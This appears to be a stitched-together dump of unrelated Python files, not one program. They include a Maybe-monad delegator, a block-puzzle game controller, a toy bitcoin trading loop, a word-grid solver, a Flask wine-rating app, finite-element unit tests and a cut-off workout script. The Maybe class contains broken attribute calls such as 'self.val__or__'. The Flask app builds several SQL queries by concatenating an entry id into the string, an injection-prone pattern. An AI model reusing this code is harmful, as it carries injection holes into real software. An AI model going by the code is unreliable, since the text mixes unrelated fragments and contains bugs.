__dir__(self): return maybe(self.val.__dir__()) def __call__(self, *args, **kwargs): return maybe(self.val.__call__(*args, **kwargs)) def __len__(self): return maybe(self.val.__len__()) def __length_hint__(self): return maybe(self.val.__length_hint__()) def __iter__(self): return maybe(self.val.__iter__()) def __reversed__(self): return maybe(self.val.__reversed__()) def __contains__(self, item): return maybe(self.val.__contains__(item)) def __add__(self, other): return maybe(self.val.__add__(other)) def __sub__(self, other): return maybe(self.val.__sub__(other)) def __mul__(self, other): return maybe(self.val.__mul__(other)) def __matmul__(self, other): return maybe(self.val.__matmul__(other)) def __truediv__(self, other): return maybe(self.val.__truediv__(other)) def __floordiv__(self, other): return maybe(self.val.__floordiv__(other)) def __mod__(self, other): return maybe(self.val.__mod__(other)) def __divmod__(self, other): return maybe(self.val.__divmod__(other)) def __pow__(self, other, modulo=None): return maybe(self.val.__pow__(other, modulo)) def __lshift__(self, other): return maybe(self.val.__lshift__(other)) def __rshift__(self, other): return maybe(self.val.__rshift__(other)) def __and__(self, other): return maybe(self.val.__and__(other)) def __xor__(self, other): return maybe(self.val.__xor__(other)) def __or__(self, other): return maybe(self.val__or__(other)) def __radd__(self, other): return maybe(self.val.__radd__(other)) def __rsub__(self, other): return maybe(self.val.__rsub__(other)) def __rmul__(self, other): return maybe(self.val.__rmul__(other)) def __rmatmul__(self, other): return maybe(self.val.__rmatmul__(other)) def __rtruediv__(self, other): return maybe(self.val.__rtruediv__(other)) def __rfloordiv__(self, other): return maybe(self.val.__rfloordiv__(other)) def __rmod__(self, other): return maybe(self.val.__rmod__(other)) def __rdivmod__(self, other): return maybe(self.val__rdivmod__(other)) def __rpow__(self, other): return maybe(self.val.__rpow__(other)) def __rlshift__(self, other): return maybe(self.val.__rlshift__(other)) def __rrshift__(self, other): return maybe(self.val.__rrshift__(other)) def __rand__(self, other): return maybe(self.val.__rand__(other)) def __rxor__(self, other): return maybe(self.val.__rxor__(other)) def __ror__(self, other): return maybe(self.val.__ror__(other)) def __iadd__(self, other): self.val.__iadd__(other) def __isub__(self, other): self.val.__isub__(other) def __imul__(self, other): self.val.__imul__(other) def __imatmul__(self, other): self.val.__imatmul__(other) def __itruediv__(self, other): self.val.__itruediv__(other) def __ifloordiv__(self, other): self.val.__ifloordiv__(other) def __imod__(self, other): self.val.__imod__(other) def __ipow__(self, other, modulo=None): self.val.__ipow__(other, modulo) def __ilshift__(self, other): self.val.__ilshift__(other) def __irshift__(self, other): self.val.__irshift__(other) def __iand__(self, other): self.val.__iand__(other) def __ixor__(self, other): self.val.__ixor__(other) def __ior__(self, other): self.val.__ior__(other) def __neg__(self): return maybe(self.val.__neg__()) def __pos__(self): return maybe(self.val.__pos__()) def __abs__(self): return maybe(self.val.__abs__()) def __invert__(self): return maybe(self.val.__invert__()) def __complex__(self): return maybe(self.val.__complex__()) def __int__(self): return maybe(self.val.__int__()) def __float__(self): return maybe(self.val.__float__()) def __index__(self): return maybe(self.val.__index__()) def __round__(self, ndigits=None): return maybe(self.val.__round__(ndigits)) def __trunc__(self): return maybe(self.val.__trunc__()) def __floor__(self): return maybe(self.val.__floor__()) def __ceil__(self): return maybe(self.val.__ceil__()) def __init__(self, val): self._val = val self._ = self.JustDelegator(val) @property def val(self): return self._val def map(self, func): return Just(func(self.val)) def flatmap(self, func): result = func(self.val) return result def unpack(self): return (self.val, True) def get(self, default=None): return self.val @property def is_nothing(self): return False def __eq__(self, other): return isinstance(other, Just) and self.val == other.val def __iter__(self): return iter((self.val,)) def __bool__(self): return True def __repr__(self): return u'Just({!r}'.format(self.val) def __str__(self): return u'Just {}'.format(self.val) class Nothing(Maybe): class NothingDelegator: def return_nothing(self, *args, **kwargs): return nothing def nop(self, *args, **kwargs): pass __getattr__ = return_nothing __getitem__ = return_nothing __missing__ = return_nothing __setitem__ = nop __delitem__ = nop __repr__ = return_nothing __str__ = return_nothing __bytes__ = return_nothing __format__ = return_nothing __lt__ = return_nothing __le__ = return_nothing __eq__ = return_nothing __ne__ = return_nothing __gt__ = return_nothing __ge__ = return_nothing __hash__ = return_nothing __bool__ = return_nothing __dir__ = return_nothing __call__ = return_nothing __len__ = return_nothing __length_hint__ = return_nothing __iter__ = return_nothing __reversed__ = return_nothing __contains__ = return_nothing __add__ = return_nothing __sub__ = return_nothing __mul__ = return_nothing __matmul__ = return_nothing __truediv__ = return_nothing __floordiv__ = return_nothing __mod__ = return_nothing __divmod__ = return_nothing __pow__ = return_nothing __lshift__ = return_nothing __rshift__ = return_nothing __and__ = return_nothing __xor__ = return_nothing __or__ = return_nothing __radd__ = return_nothing __rsub__ = return_nothing __rmul__ = return_nothing __rmatmul__ = return_nothing __rtruediv__ = return_nothing __rfloordiv__ = return_nothing __rmod__ = return_nothing __rdivmod__ = return_nothing __rpow__ = return_nothing __rlshift__ = return_nothing __rrshift__ = return_nothing __rand__ = return_nothing __rxor__ = return_nothing __ror__ = return_nothing __iadd__ = nop __isub__ = nop __imul__ = nop __imatmul__ = nop __itruediv__ = nop __ifloordiv__ = nop __imod__ = nop __ipow__ = nop __ilshift__ = nop __irshift__ = nop __iand__ = nop __ixor__ = nop __ior__ = nop __neg__ = return_nothing __pos__ = return_nothing __abs__ = return_nothing __invert__ = return_nothing __complex__ = return_nothing __int__ = return_nothing __float__ = return_nothing __index__ = return_nothing __round__ = return_nothing __trunc__ = return_nothing __floor__ = return_nothing __ceil__ = return_nothing _ = NothingDelegator() @property def val(self): raise NoValueError def map(self, func): return self def flatmap(self, func): return self def unpack(self): return (None, False) def get(self, default=None): return default @property def is_nothing(self): return True def __eq__(self, other): return isinstance(other, Nothing) def __iter__(self): return iter(()) def __bool__(self): return False def __repr__(self): return u'Nothing()' def __str__(self): return u'Nothing' nothing = Nothing() def maybe(val): return val if isinstance(val, Maybe) \ else Just(val) if val is not None else nothing def maybe_lazy(generator): return maybe(next(generator, None)) maybe.lazy = maybe_lazy from __future__ import annotations from typing import Optional import src.elements as elements import src.game.element_data as element_data from src.game.movement import Movement from src.game.physics import RigidBody from src.game.vector2D import Vector2D class Controller: """Controller base class for controlling the movement of level elements.""" def __init__(self): pass def _move( self, data: element_data.ElementData, direction: Vector2D, ) -> None: """Moves this level element laterally by some number of spaces given. The number of spaces can be positive or negative. """ RigidBody.move_active_element(data, direction) def move_up(self, data: element_data.ElementData) -> None: """Move this level element upward according to the rules.""" self._move(data, Movement.UP) def move_left(self, data: element_data.ElementData) -> None: """Move this level element leftward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self._move(data, Movement.LEFT) def move_right(self, data: element_data.ElementData) -> None: """Move this level element rightward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self._move(data, Movement.RIGHT) def move_down(self, data: element_data.ElementData) -> None: """Move this level element rightward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self._move(data, Movement.DOWN) def interact(self, data: element_data.ElementData) -> None: pass def get_head_of_active(data: element_data.ElementData) -> elements.LevelElement: """...""" head_position = data.active_element.position + Movement.UP return data.level.get_element_at_position(head_position) def get_lateral_of_active(data: element_data.ElementData) -> elements.LevelElement: """...""" lateral_position = data.active_element.position + data.active_element.facing return data.level.get_element_at_position(lateral_position) def get_top_lateral_of_active(data: element_data.ElementData) -> elements.LevelElement: """...""" top_lateral_position = get_lateral_of_active(data).position + Movement.UP return data.level.get_element_at_position(top_lateral_position) def is_block(element: elements.LevelElement) -> bool: """Whether the element is a block.""" return isinstance(element, elements.Block) def is_space(element: elements.LevelElement) -> bool: """Whether the element is a block.""" return isinstance(element, elements.Space) def is_clear_for_action(*elements: elements.LevelElement) -> bool: """Ensures the area around the character is clear for picking up blocks.""" return all((is_space(element) for element in elements)) class DoNothingController: """The do nothing controller. Useful for doing nothing on a level element.""" class DudeController(Controller): """Block Dude controller with its rules.""" def __init__(self): super().__init__() self.carrying: Optional[elements.ControllableLevelElement] = None def move( self, data: element_data.ElementData, direction: Vector2D, ) -> None: """Moves the selected element around the map""" # Move the carrying block as well top_lateral_element = get_top_lateral_of_active(data) # lateral_element = get_lateral_of_active(data) position = RigidBody.move_element(data, direction, data.active_element) if self.carrying and is_clear_for_action(top_lateral_element): # Check if we can move block_position = RigidBody.move_element(data, direction, self.carrying) if (block_position - position).x: self.carrying = None def move_left(self, data: element_data.ElementData) -> None: """Move this level element leftward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self.move(data, Movement.LEFT) def move_right(self, data: element_data.ElementData) -> None: """Move this level element rightward according to the rules. If there are any objects to the left of block dude, he cannot move left. """ self.move(data, Movement.RIGHT) def move_up(self, data: element_data.ElementData) -> None: """Move this level element upward according to the rules.""" active_element = data.active_element facing = active_element.facing lateral_element = get_lateral_of_active(data) head_element = get_head_of_active(data) if not is_clear_for_action(lateral_element): el = data.level.get_element_at_position(head_element.position + Movement.UP) if not self.carrying and is_clear_for_action(head_element, el): up_and_lateral_position = facing + Movement.UP self.move(data, up_and_lateral_position) elif self.carrying: up_and_lateral_position = facing + Movement.UP self.move(data, up_and_lateral_position) def box_action(self, data: element_data.ElementData) -> None: """The box action as picking up or dropping.""" lateral_element = get_lateral_of_active(data) top_lateral_element = get_top_lateral_of_active(data) head_element = get_head_of_active(data) if not self.carrying: if is_block(lateral_element) and is_clear_for_action( top_lateral_element, head_element, ): RigidBody.move_element_to_destination( data, head_element.position, lateral_element ) data.soundboard.play_sfx("pickup_square") self.carrying = lateral_element else: # top lateral position is empty space, drop it if is_clear_for_action(top_lateral_element): facing = data.active_element.facing RigidBody.move_element(data, facing, self.carrying) data.soundboard.play_sfx("thud") self.carrying = None def move_down(self, data: element_data.ElementData) -> None: """Move down action from command.""" self.box_action(data) def interact(self, data: element_data.ElementData) -> None: if self.carrying: return position = data.level.active_element.position below = position + Movement.DOWN bottom_element = data.level.get_element_at_position(below) if isinstance(bottom_element, elements.TelekinesisPad): block = data.level.find_element(elements.TelekinesisBlock) data.level.set_active_element(block) data.soundboard.play_sfx("tele_pickup") class TelekinesisController(Controller): def _move( self, data: element_data.ElementData, direction: Vector2D, ) -> None: """movement function without rigid body so that the cube can float""" position = data.level.active_element.position lateral_position = position + direction lateral_element = data.level.get_element_at_position(lateral_position) destination = lateral_position if isinstance(lateral_element, elements.Space): destination = lateral_position data.soundboard.play_sfx("step") else: destination = position data.soundboard.play_sfx("bump") data.level.move_element(position, destination) def interact(self, data: element_data.ElementData): """Gives the controls back to blockdude Also drops the block before so that it doesn't float """ data.soundboard.play_sfx("tele_drop") position = data.level.active_element.position below = position + Movement.DOWN while isinstance(data.level.get_element_at_position(below), elements.Space): below += Movement.DOWN data.level.move_element(position, below+Movement.UP) dude = data.level.find_element(elements.Dude) data.level.set_active_element(dude) # -*- coding: utf-8 -*- """ Spyder Editor This is a temporary script file. """ import random balance = 500000 balance_history = [] BUY = True SELL = False trades_pairs_to_make = 100 def get_bitcoin_price(): return random.randint(0,20000) def trade (side, price, current_balance): x = 5 if side: current_balance = current_balance - price else: current_balance = current_balance + price return current_balance for n in range(0,trades_pairs_to_make): price = get_bitcoin_price() balance = trade(BUY, price, balance) balance_history.append(balance) price = get_bitcoin_price() balance = trade(SELL, price, balance) balance_history.append(balance) print ('Trades made', trades_pairs_to_make *2) print(balance_history) grpc_framework/interceptors/log.py10-100 """ log interceptor """ import grpc from grpc_framework.decorators import log_deco class LoggerInterceptor(grpc.ServerInterceptor): @log_deco def intercept_service(self, continuation, handler_call_details): return continuation(handler_call_details) sbernasek/flyqmaflyqma/validation/growth.py import numpy as np from ..visualization import * class GrowthTrends: """ Class for extracting and plotting clone trends. """ def __init__(self, data): """ Instantiate object for plotting clone trend data. Args: data (pd.DataFrame) """ self.data = data.replace([np.inf, -np.inf], np.nan) self.x = 2**self.means.recombination_start self.ylabels = { 'num_clones': 'Number of clones', 'mean_clone_size': 'Mean clone size', 'percent_heterozygous': 'Recombination extent', 'transclone_edges': 'Trans-clone edges per cell', 'clone_size_variation': 'Clone size variation'} @property def num_replicates(self): """ Number of growth replicates. """ return self.data.replicate_id.max()+1 @property def means(self): """ Mean values aggregated over replicates. """ gb = self.data.groupby('column_id') return gb.mean() @property def stds(self): """ Std dev of values aggregated over replicates. """ gb = self.data.groupby('column_id') return gb.std() @default_figure def plot_trend(self, yvar, ax=None, **kwargs): """ Plot against recombination start generation. """ # get y data y = self.means[yvar] ystd = self.stds[yvar] y_SEM = ystd / np.sqrt(self.num_replicates) # plot trend ax.errorbar(self.x, y, yerr=y_SEM, **kwargs) # format axis ax.set_xlabel('Recombination start (no. cells)') ylabel = '' if yvar in self.ylabels.keys(): ylabel = self.ylabels[yvar] ax.set_ylabel(ylabel) ax.set_xscale('log', basex=2) ax.set_xticks([1,2,4,8,16,32,64,128,256,512]) ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) #Written by: #Version 1.0 import enchant #------------------------------------------------------------------FUNCTIONS CREATED AND DEFINED HERE------------------------------------------------------------------ #A recursive search algorithm that finds words of a given length in a 2d table of letters #by treating the letters as nodes with edges to all the letters in the table immediately surrounding #the given letter. #results is a set of strings containing words that are found #word_table is a list of strings that compose the letters and their positions given by wordbubbles #word_length is the target length of a word #curr_length is the length of the current recursive branch #visited is a set of tuples representing visited already visited letters in the current branch #prev_string is a string keeping track of the previously visited letters and their order of the current branch #curr_coord is a tuple of the coordinate in word_table of the letter currently being visited #dict is a spell checker that is used to see if generated strings are english words def find_words(results, word_table, word_length, curr_len, visited, prev_string, curr_coord, dictionary): #end branches that lead to empty spaces ('-' metacharacter) if word_table[curr_coord[0]][curr_coord[1]] == '-': return #update the string prev_string = prev_string+word_table[curr_coord[0]][curr_coord[1]] #base case, end the recursive branch when you've reached a word of the target length if curr_len == word_length: if prev_string not in results and dictionary.check(prev_string.lower()): results.add(prev_string) return #If the branch doesn't terminate, update information and recurr #makes a copy of the visited set (since sets behave as pass by reference) and adds the current coordinate to visited update_visited = set([]) update_visited.add(curr_coord) update_visited = update_visited.union(visited) x_coord = curr_coord[0] y_coord = curr_coord[1] columns = len(word_table[0]) rows = len(word_table) #attempt to recurr at all surrounding spaces that are in bounds and that haven't been visted yet if x_coord-1 >= 0 and y_coord-1 >= 0: if (x_coord-1, y_coord-1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord-1, y_coord-1), dictionary) if x_coord-1 >= 0: if (x_coord-1, y_coord) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord-1, y_coord), dictionary) if x_coord-1 >= 0 and y_coord+1 < columns: if (x_coord-1, y_coord+1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord-1, y_coord+1), dictionary) if y_coord+1 < columns: if (x_coord, y_coord+1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord, y_coord+1), dictionary) if x_coord+1 < rows and y_coord+1 < columns: if (x_coord+1, y_coord+1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord+1, y_coord+1), dictionary) if x_coord+1 < rows: if (x_coord+1, y_coord) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord+1, y_coord), dictionary) if x_coord+1 < rows and y_coord-1 >= 0: if (x_coord+1, y_coord-1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord+1, y_coord-1), dictionary) if y_coord-1 >= 0: if (x_coord, y_coord-1) not in visited: find_words(results, word_table, word_length, curr_len+1, update_visited, prev_string, (x_coord, y_coord-1), dictionary) def get_input(word_length, word_table, rows): rows = unicode(raw_input("Please enter the number of rows of letters: "), 'utf-8') if rows.isnumeric(): if not float(rows).is_integer(): print "Number of rows must be an integer" exit() else: print "Number of rows must be an integer" exit() word_length = unicode(raw_input("Please enter the number of letters in the word: "), 'utf-8') if word_length.isnumeric(): if not float(word_length).is_integer(): print "Number of letters must be an integer" exit() else: print "Number of letters must be an integer" exit() print "\n\n\nYou will now be prompted to input strings of characters representing each row. If there is an empty space in a row, enter '-' in the string.\n For example, if the wordbubbles grid of letters looked like this:\nA B D F\nD A B S\nS N K\n you would enter 'ABDF' for row 1, 'DABS' for row 2, and 'SN-K' for row 3.\n\n\n" for num in range(int(rows)): word_table.append(raw_input("Please enter a string of characters representing row #"+str(num)+": ")) return (int(word_length), int(rows)) #---------------------------------------HANDLE INPUT------------------------------------------ if __name__ == '__main__': word_table = [] results = set([]) word_length = 0 rows = 0 dictionary = enchant.Dict("en_US") values = get_input(word_length, word_table, rows) word_length = values[0] rows = values[1] #----------------------------------FIND SOLUTIONS----------------------------------------- #Run the function to search for words of the target length at every location. for x_coord in range(rows): for y_coord in range(len(word_table[0])): curr_coord = (x_coord, y_coord) visited = set([]) find_words(results, word_table, word_length, 1, visited, "", curr_coord, dictionary) for item in results: print item ftlow.py #!/usr/bin/env python2 """ For The Love of Wine (FTLOW) ~~~~~~ A quick and dirty wine rating application based (heavily) off the Flaskr Flask example by and sqlite3 :copyright: (c) 2013 by . :license: BSD, see LICENSE for more details. """ from __future__ import with_statement import sqlite3 from flask import Flask, request, session, g, redirect, url_for, abort, \ render_template, flash, _app_ctx_stack, Response from flaskext.bcrypt import Bcrypt import os, sys import StringIO import flickr import urllib, urlparse # create our little application :) app = Flask(__name__) bcrypt = Bcrypt(app) app.config.from_pyfile('settings.py') """ Begin Database functions """ def init_db(): """Creates the database tables.""" with app.app_context(): db = get_db() with app.open_resource('schema.sql') as f: db.cursor().executescript(f.read()) db.commit() def get_db(): """Opens a new database connection if there is none yet for the current application context. """ top = _app_ctx_stack.top if not hasattr(top, 'sqlite_db'): sqlite_db = sqlite3.connect(app.config['DATABASE'], check_same_thread = False) sqlite_db.row_factory = sqlite3.Row top.sqlite_db = sqlite_db return top.sqlite_db @app.teardown_appcontext def close_db_connection(exception): """Closes the database again at the end of the request.""" top = _app_ctx_stack.top if hasattr(top, 'sqlite_db'): top.sqlite_db.close() def query_db(query, args=(), one=False): db = get_db() cur = db.execute(query, args) rv = [dict((cur.description[idx][0], value) for idx, value in enumerate(row)) for row in cur.fetchall()] return (rv[0] if rv else None) if one else rv """ functions dealing with users in DB """ def get_user(name): user = query_db('select * from users where username = ?', [name], one=True) if user is None: return None else: return user['username'] def get_username(user_id): username = query_db('select username from users where id = ?', [user_id], one=True) return username['username'] def match_password(name, password): password_hash = query_db('select password from users where username = ?', [name], one=True) return bcrypt.check_password_hash(password_hash['password'], password) """ Begin views """ @app.route('/index', endpoint='show_landing_page-alternative') @app.route('/') def show_landing_page(): return render_template('index.html') @app.route('/drink') def show_entries_drink(): if not session.get('logged_in'): error = "Please login or create an account" return render_template('login.html', error=error) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() cur = db.execute('select id, winery, location, vintage, style, vineyard, drank from entries where drank=? and username=? order by winery asc', ('0', user_name)) entries = cur.fetchall() for entry in entries: get_photo_drink(entry[0]) #os.remove('static/' + str(entry[0]) + '.jpg') cur.close() return render_template('show_drink.html', entries=entries, user_name=user_name) @app.route('/static/.jpg') def get_photo_drink(entry_id): if not session.get('logged_in'): abort(401) else: db = get_db() cur = db.execute('select photo from entries where id=' + str(entry_id)) ablob = cur.fetchone() cur.close() return Response(ablob[0]) @app.route('/drank') def show_entries_drank(): db = get_db() cur = db.execute('select winery, location, vintage, style, vineyard, rating, thoughts, flavours, drank, id from entries where drank=? order by winery asc', '1') entries = cur.fetchall() cur.close() return render_template('show_drank.html', entries=entries) """ Begin adding entries """ @app.route('/drank/add', methods=['POST']) def add_entry_drank(): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('insert into entries (winery, location, vintage, style, vineyard, rating, thoughts, flavours, drank, username) values (?, ?, ?, ?, ?, ?, ?, ?, 1, ?)', [request.form['winery'], request.form['location'], request.form['vintage'], request.form['style'], request.form['vineyard'], request.form['rating'], request.form['thoughts'], request.form['flavours'], user_name]) db.commit() flash('New entry was successfully posted') return redirect(url_for('show_entries_drank')) @app.route('/drink/add', methods=['POST']) def add_entry_drink(): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) tag = 'creativecommons' text = request.form['winery'] + ' ' + request.form['style'] print 'Searching for: ', text photos = flickr.photos_search(text=text, tags=tag) urllist = [] #store a list of what was downloaded path = '' if not photos: photo = open("static/default.jpg", "rb").read() photobin = sqlite3.Binary(photo) else: flash('Downloading image, please be patient') url = photos[0].getURL(size='Medium', urlType='source') urllist.append(url) path = os.path.basename(urlparse.urlparse(url).path) photo = urllib.URLopener().retrieve(url, path) print 'downloading: ', url file, mime = urllib.urlretrieve(url) photo = open(file, "rb").read() photobin = sqlite3.Binary(photo) db = get_db() db.execute('insert into entries (winery, location, vintage, style, vineyard, drank, username, photo) values (?, ?, ?, ?, ?, 0, ?, ?)', [request.form['winery'], request.form['location'], request.form['vintage'], request.form['style'], request.form['vineyard'], user_name, photobin]) db.commit() if (path): print 'removing photo at: ', path os.remove(path) flash('New entry was successfully posted') return redirect(url_for('show_entries_drink')) @app.route('/drank/remove/') def remove_entry_drank(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('delete from entries where id =' + str(entry_id)) db.commit() flash('Entry was successfully removed') return redirect(url_for('show_entries_drank')) @app.route('/drink/remove/') def remove_entry_drink(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('delete from entries where id =' + str(entry_id)) db.commit() flash('Entry was successfully removed') return redirect(url_for('show_entries_drink')) @app.route('/drank/move/') def move_entry_drank(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('update entries set drank=0 where id =' + str(entry_id)) db.commit() flash('Entry was successfully moved to Drink') return redirect(url_for('show_entries_drink')) @app.route('/drink/move/') def move_entry_drink(entry_id): if not session.get('logged_in'): abort(401) else: user_id = session['user_id'] user_name = get_username(user_id) db = get_db() db.execute('update entries set drank=1 where id =' + str(entry_id)) db.commit() flash('Entry was successfully moved to Drank') return redirect(url_for('show_entries_drank')) """ Begin login/logout/register """ @app.route('/login', methods=['GET', 'POST']) def login(): error = None if request.method == 'POST': if get_user(request.form['username']) is None: error = 'Please register' elif not match_password(request.form['username'], request.form['password']): error = 'Invalid password, try again' else: user = query_db('select id from users where username = ?', [request.form['username']], one=True) session['logged_in'] = True session['user_id'] = user['id'] flash('You were logged in') return redirect(url_for('show_entries_drank')) return render_template('login.html', error=error) @app.route('/logout') def logout(): session.pop('logged_in', None) flash('You were logged out') return redirect(url_for('show_entries_drank')) @app.route('/register', methods=['GET', 'POST']) def register(): error = None db = get_db() if request.method == 'POST' and not get_user(request.form['username']): pw_hash = bcrypt.generate_password_hash(request.form['password']) db.execute('insert into users (username, password) values (?, ?)', [request.form['username'], pw_hash]) db.commit() return redirect(url_for('login')) elif request.method == 'POST': error = "Username has already been taken" return render_template('login.html', error=error) return render_template('login.html') """ Begin custom error pages """ @app.errorhandler(401) def page_unauthorized(e): return render_template('401.html'), 401 @app.errorhandler(403) def page_forbidden(e): return render_template('403.html'), 403 @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 @app.errorhandler(500) def page_server_error(e): return render_template('500.html'), 500 """ main """ if __name__ == '__main__': try: with open('ftlow.db'): app.run(host='192.168.1.187') except IOError as e: init_db() app.run(host='192.168.1.187') # -*- coding: utf-8 -*- ''' Test for checking Neumann conditions. ''' from unittest import TestCase import numpy as np import scipy as sp import pandas as pd from pandas.testing import assert_frame_equal from numpy.testing import assert_allclose, assert_almost_equal from amfe.element import Tri3Boundary, Tri6Boundary, Quad4Boundary, Quad8Boundary, LineLinearBoundary from amfe.element.boundary_element import BoundaryElement from amfe.neumann import * class DummyBoundary(BoundaryElement): def __init__(self): pass def f_mat(self, X, u): f_mat = np.array([[0, -1/3], [0, -1/3]]) return f_mat class NeumannTest(TestCase): def setUp(self): self.test_boundary = DummyBoundary() self.test_direct = np.array([1, -1]) self.time_func = lambda t: 2 def tearDown(self): pass def test_fixed_direction_neumann(self): X = None u = None t = 0.0 neumann = FixedDirectionNeumann(self.test_direct, self.time_func) neumann._boundary_element = self.test_boundary f_ext_actual = neumann.f_ext(X, u, t) desired_f = np.array([2/3, -2/3, 2/3, -2/3]) np.testing.assert_allclose(f_ext_actual, desired_f, rtol=1E-6, atol=1E-7) def test_normal_following_neumann(self): X = None u = None t = 0.0 neumann = NormalFollowingNeumann(self.time_func) neumann._boundary_element = self.test_boundary f_proj = neumann._f_proj(self.test_boundary.f_mat(X, u)) f_ext_actual = neumann.f_ext(X, u, t) desired_f = np.array([0, -2/3, 0, -2/3]) np.testing.assert_allclose(f_ext_actual, desired_f, rtol=1E-6, atol=1E-7) def test_projected_neumann(self): X = None u = None t = 0.0 neumann = ProjectedAreaNeumann(self.test_direct, self.time_func) neumann._boundary_element = self.test_boundary f_ext_actual = neumann.f_ext(X, u, t) desired_f = np.array([0.47140452, -0.47140452, 0.47140452, -0.47140452]) np.testing.assert_allclose(f_ext_actual, desired_f, rtol=1E-6, atol=1E-7) class TestNeumannManager(TestCase): def setUp(self): self.neumann_man = NeumannManager() self.test_boundary = DummyBoundary() self.test_direct = np.array([1, -1]) self.time_func = lambda t: 2 def test_create_neumann(self): neumann = self.neumann_man.create_fixed_direction_neumann(direction=self.test_direct) self.assertIsInstance(neumann, FixedDirectionNeumann) neumann = self.neumann_man.create_normal_following_neumann() self.assertIsInstance(neumann, NormalFollowingNeumann) neumann = self.neumann_man.create_projected_area_neumann(direction=self.test_direct) self.assertIsInstance(neumann, ProjectedAreaNeumann) def test_assign_neumann_by_eleids(self): eleids = [2, 7] ele_shapes = ['Tri3', 'Quad4'] time_func = lambda t: 3.0*t neumannbc = self.neumann_man.create_fixed_direction_neumann((1, 0), time_func) self.neumann_man.assign_neumann_by_eleids(neumannbc, eleids, ele_shapes, tag='_eleids', property_names=eleids, name='TestCondition') neumann_obj_df = self.neumann_man.el_df neumann_obj_array = neumann_obj_df[['neumann_obj', 'fk_mesh']].values self.assertIsInstance(neumann_obj_array[0, 0], FixedDirectionNeumann) self.assertIsInstance(neumann_obj_array[0, 0]._boundary_element, Tri3Boundary) self.assertEqual(neumann_obj_array[0, 1], 2) self.assertIsInstance(neumann_obj_array[1, 0], FixedDirectionNeumann) self.assertIsInstance(neumann_obj_array[1, 0]._boundary_element, Quad4Boundary) self.assertEqual(neumann_obj_array[1, 1], 7) self.assertEqual(neumann_obj_array.shape, (2, 2)) neumann_df_actual = self.neumann_man._neumann_df df_dict = {'name': {0: 'TestCondition'}, 'tag': {0: '_eleids'}, 'property_names': {0: np.array([2, 7], dtype=int)}, 'neumann_obj': neumannbc} neumann_df_desired = pd.DataFrame.from_dict(df_dict) assert_frame_equal(neumann_df_actual, neumann_df_desired, check_like=True) def test_get_ele_obj_fk_mesh_and_fk_mapping(self): eleids = [2, 7] ele_shapes = ['Tri3', 'Quad4'] time_func = lambda t: 3.0 * t neumannbc = self.neumann_man.create_fixed_direction_neumann((1, 0), time_func) self.neumann_man.assign_neumann_by_eleids(neumannbc, eleids, ele_shapes, tag='_eleids', property_names=eleids, name='TestCondition') fks = [100, 105] local_ids = self.neumann_man.el_df.index.get_values() for fk, local_id in zip(fks, local_ids): self.neumann_man.write_mapping_key(fk, local_id) ele_obj, fk_mesh, fk_mapping, = self.neumann_man.get_ele_obj_fk_mesh_and_fk_mapping() # test ele_obj self.assertIsInstance(ele_obj[0], FixedDirectionNeumann) self.assertIsInstance(ele_obj[0]._boundary_element, Tri3Boundary) self.assertIsInstance(ele_obj[1], FixedDirectionNeumann) self.assertIsInstance(ele_obj[1]._boundary_element, Quad4Boundary) # test fk_mesh self.assertEqual(fk_mesh[0], 2) self.assertEqual(fk_mesh[1], 7) # test fk_mapping self.assertEqual(fk_mapping[0], 100) self.assertEqual(fk_mapping[1], 105) def test_write_mapping(self): eleids = [2, 7] ele_shapes = ['Tri3', 'Quad4'] time_func = lambda t: 3.0 * t neumannbc = self.neumann_man.create_fixed_direction_neumann((1, 0), time_func) self.neumann_man.assign_neumann_by_eleids(neumannbc, eleids, ele_shapes, tag='_eleids', property_names=eleids, name='TestCondition') neumann_obj_df = self.neumann_man.el_df fk = 100 local_id = neumann_obj_df.index.get_values()[0] self.neumann_man.write_mapping_key(fk, local_id) actual = self.neumann_man.el_df.loc[local_id, 'fk_mapping'] self.assertEqual(actual, fk) """ Edge Module ============ Represents the edge in the undirected graph. Contains the two connected vertices u and w. Usage: * Not to be run as the main class. * Used as a link between vertices. Example: u = Vertex(x1, y1) v = Vertex(x2, y2) # Undirected, so Edge(v, u) == Edge(u, v) e = Edge(v, u) """ class Edge: """ Edge Class ---------- Represents the edge between two vertices Attributes: * u (Vertex): The vertex connected. * v (Vertex): The vertex connected. """ def __init__(self, u, v): """ Initialises the edge with two vertices * :param u (Vertex): Vertex U connected with this edge. * :param v (Vertex): Vertex V connected with this edge. """ self.u = u self.v = v def __eq__(self, other): """ Overrides the base equality so we can check that two edges are equal to each other. * :param other: The other object we are comparing :return: Bool if equal """ # If it's the same class, then it should have the same vertices. if isinstance(other, Edge): return (other.u == self.v or other.u == self.u) \ and (other.v == self.u or other.v == self.v) # If it's not the same class, it's not equal return False def __repr__(self): """ Defines the string representation of the edge. """ return "<{}-{}>".format(self.u, self.v) def __hash__(self): """ Makes the class hashable """ return hash(repr(self)) Tiago-S-Ribeiro/Python-Pro-Bootcamp100_days_of_code/Intermediate+/day_38/main.py from data import API_KEY, APP_ID, ENDPOINT, GENDER, WEIGHT, HEIGHT, AGE, WORKOUT_ENDPOINT, AUTH import requests import datetime as dt workout_headers = { "Authorization": AUTH } nutri_headers = { "x-app-id": APP_ID, "x-app-key": API_KEY, } current_date = 